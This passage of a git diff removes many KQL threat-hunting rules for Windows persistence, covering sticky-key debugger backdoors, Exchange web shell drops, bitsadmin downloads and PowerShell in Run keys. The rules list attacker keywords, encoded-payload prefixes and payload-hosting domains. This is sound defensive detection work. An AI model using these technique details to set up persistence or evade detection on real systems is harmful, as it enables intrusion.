attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file diff --git a/Persistence/Startup_Folder_File_Write.kql b/Persistence/Startup_Folder_File_Write.kql deleted file mode 100644 index d547ca8a..00000000 --- a/Persistence/Startup_Folder_File_Write.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. -// Tags: attack.persistence, attack.t1547.001 -DeviceFileEvents -| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) \ No newline at end of file diff --git a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql b/Persistence/Sticky_Key_Like_Backdoor_Execution.kql deleted file mode 100644 index 0509bca7..00000000 --- a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018/03/15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -DeviceProcessEvents -| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe" \ No newline at end of file diff --git a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql deleted file mode 100644 index 0a1e634c..00000000 --- a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018/03/15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -DeviceRegistryEvents -| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger" \ No newline at end of file diff --git a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql b/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql deleted file mode 100644 index e3938878..00000000 --- a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), MSTI (query, idea) -// Date: 2022/10/01 -// Level: high -// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder -// Tags: attack.persistence, attack.t1505.003 -DeviceFileEvents -| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx") \ No newline at end of file diff --git a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql b/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql deleted file mode 100644 index b669d6d5..00000000 --- a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye Team, wagga -// Date: 2020/12/11 -// Level: high -// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. -// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql deleted file mode 100644 index b9990b32..00000000 --- a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/04 -// Level: critical -// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql deleted file mode 100644 index 6ce7feb5..00000000 --- a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) -// Date: 2022/06/19 -// Level: high -// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension -// Tags: attack.persistence, attack.t1176 -DeviceProcessEvents -| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql b/Persistence/Suspicious_Debugger_Registration_Cmdline.kql deleted file mode 100644 index 8a4f2a41..00000000 --- a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019/09/06 -// Level: high -// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008 -DeviceProcessEvents -| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe") \ No newline at end of file diff --git a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql deleted file mode 100644 index 194705f0..00000000 --- a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql deleted file mode 100644 index b4aa432b..00000000 --- a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file from a suspicious domain -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql b/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql deleted file mode 100644 index 243e56dd..00000000 --- a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger -// Date: 2021/09/30 -// Level: medium -// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin -// Tags: attack.persistence, attack.t1547 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql deleted file mode 100644 index 700cfc45..00000000 --- a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/20 -// Level: high -// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment" \ No newline at end of file diff --git a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql deleted file mode 100644 index f12091dd..00000000 --- a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/12 -// Level: high -// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware -// Tags: attack.persistence, attack.defense_evasion -DeviceFileEvents -| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\") \ No newline at end of file diff --git a/Persistence/Suspicious_File_Drop_by_Exchange.kql b/Persistence/Suspicious_File_Drop_by_Exchange.kql deleted file mode 100644 index 6f40640f..00000000 --- a/Persistence/Suspicious_File_Drop_by_Exchange.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/10/04 -// Level: medium -// Description: Detects suspicious file type dropped by an Exchange component in IIS -// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003 -DeviceFileEvents -| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/Persistence/Suspicious_Get-Variable.exe_Creation.kql b/Persistence/Suspicious_Get-Variable.exe_Creation.kql deleted file mode 100644 index da1a04b7..00000000 --- a/Persistence/Suspicious_Get-Variable.exe_Creation.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/04/23 -// Level: high -// Description: Get-Variable is a valid PowerShell cmdlet -WindowsApps is by default in the path where PowerShell is executed. -So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. - -// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027 -DeviceFileEvents -| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_GrpConv_Execution.kql b/Persistence/Suspicious_GrpConv_Execution.kql deleted file mode 100644 index 1bc03b8a..00000000 --- a/Persistence/Suspicious_GrpConv_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/05/19 -// Level: high -// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors -// Tags: attack.persistence, attack.t1547 -DeviceProcessEvents -| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o" \ No newline at end of file diff --git a/Persistence/Suspicious_IIS_Module_Registration.kql b/Persistence/Suspicious_IIS_Module_Registration.kql deleted file mode 100644 index 02baba3a..00000000 --- a/Persistence/Suspicious_IIS_Module_Registration.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Microsoft (idea) -// Date: 2022/08/04 -// Level: high -// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors -// Tags: attack.persistence, attack.t1505.004 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I")) \ No newline at end of file diff --git a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql deleted file mode 100644 index 039ecce5..00000000 --- a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation -// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp") \ No newline at end of file diff --git a/Persistence/Suspicious_New_Service_Creation.kql b/Persistence/Suspicious_New_Service_Creation.kql deleted file mode 100644 index 2450ee8b..00000000 --- a/Persistence/Suspicious_New_Service_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/14 -// Level: high -// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/Persistence/Suspicious_Outlook_Macro_Created.kql b/Persistence/Suspicious_Outlook_Macro_Created.kql deleted file mode 100644 index e9f30292..00000000 --- a/Persistence/Suspicious_Outlook_Macro_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: high -// Description: Detects the creation of a macro file for Outlook. -// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546 -DeviceFileEvents -| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe")) \ No newline at end of file diff --git a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql deleted file mode 100644 index 504899dd..00000000 --- a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/14 -// Level: high -// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") \ No newline at end of file diff --git a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql b/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql deleted file mode 100644 index bf7164d3..00000000 --- a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022/03/17 -// Level: medium -// Description: Detects potential PowerShell commands or code within registry run keys -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" \ No newline at end of file diff --git a/Persistence/Suspicious_Process_By_Web_Server_Process.kql b/Persistence/Suspicious_Process_By_Web_Server_Process.kql deleted file mode 100644 index 3fef9b24..00000000 --- a/Persistence/Suspicious_Process_By_Web_Server_Process.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/01/16 -// Level: high -// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation - -// Tags: attack.persistence, attack.t1505.003, attack.t1190 -DeviceProcessEvents -| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe")))) \ No newline at end of file diff --git a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql deleted file mode 100644 index 317441d1..00000000 --- a/Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/12 -// Level: high -// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. -// Tags: attack.persistence, attack.defense_evasion -DeviceProcessEvents -| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\" \ No newline at end of file diff --git a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql deleted file mode 100644 index 7ac4d66c..00000000 --- a/Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Florian Roth -// Date: 2021/12/17 -// Level: high -// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) -// Tags: attack.initial_access, attack.persistence, 